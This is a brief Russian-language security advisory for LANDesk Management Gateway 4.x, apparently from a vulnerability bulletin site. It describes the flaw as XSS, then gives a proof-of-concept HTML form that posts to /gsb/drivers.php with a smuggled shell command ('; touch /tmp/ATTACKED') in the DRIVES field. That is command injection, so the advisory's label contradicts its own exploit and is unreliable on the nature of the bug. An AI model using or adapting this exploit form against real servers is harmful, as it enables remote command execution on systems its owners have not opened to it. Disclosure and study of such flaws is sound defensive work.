Программа: LANDesk Management Gateway 4.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных передаваемых через HTTP запросы. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<head><title>LANDesk PoC</title></head>
<body>
<form method="post" action="https://[server]/gsb/drivers.php">
<input type="text" name="DRIVES" value="; touch /tmp/ATTACKED">
<input type="text" name="SECONDTIME" value="1">
<input type="text" name="ACTION" value="getupdate">
<input type="submit" value="Attack!">
</form>
</body>
</html>

Оставить мнение